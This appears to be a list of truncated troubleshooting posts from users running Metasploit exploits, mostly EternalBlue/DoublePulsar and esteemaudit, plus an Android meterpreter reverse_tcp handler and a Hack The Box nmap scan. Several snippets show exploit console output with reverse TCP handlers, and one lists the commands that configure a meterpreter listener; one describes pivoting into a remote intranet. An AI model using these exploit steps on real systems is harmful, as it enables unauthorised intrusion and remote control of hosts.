-
error:sending wrong targetarchitecture DLL to target
-
I access the remote intranet machine via post/windows/manage/autoroute。
192.168.244.0 255.255.255.0 Session 7
Then I want to attack a remote host with eternalblue_doublepulsar , but fa…
-
https://app.hackthebox.com/machines/Blue
```
$ nmap -sC -sV -Pn 10.10.10.40
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-23 00:51 JST
Nmap scan report for 10.10.10.40
Host is up (0.41s…
-
I get this error when i load msfconsole:
[-] WARNING! The following modules could not be loaded!
[-] /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb: LoadError …
-
My Target is XPSP2 x86 3389 OPEN. But it still say "The machine is not vulnerable!"
I already do this :
- Copy the esteemaudit.rb on the right Metasploit folder
- Copy only the content of "files"…
-
I am using the latest version of kali linux; i tryed following command
Msfconsole
Use exploit/multi/handler
Set payload android/meterpreter/reverse_tcp
Set lhost (my ip)
Set lport4444
Exploit -j…
-
i runned eternalblue and configured everything corectly but this still pops up no matter what
Started reverse TCP handler on 192.168.9.188:4444
[*] 192.168.10.188:4444 - Connecting to …
-
I have installed eternalblue_doublepulsar on my Linux box earlyer and it works perfectly.Now I installed it on my nethunter And I get this
*] Started reverse TCP handler on 192.168.1.103:4444
[*] …
-
*] Started reverse TCP handler on 192.168.195.129:4444
[*] 192.168.1.150:445 - Generating Eternalblue XML data
[*] 192.168.1.150:445 - Generating Doublepulsar XML data
[*] 192.168.1.150:445 - Gene…
-
Hello the developer:
How should i solve it?
**
[*] Started reverse TCP handler on 192.168.12.110:8888
[*] 192.168.12.106:445 - Generating Eternalblue XML data
[*] 192.168.12.106:445 - Generat…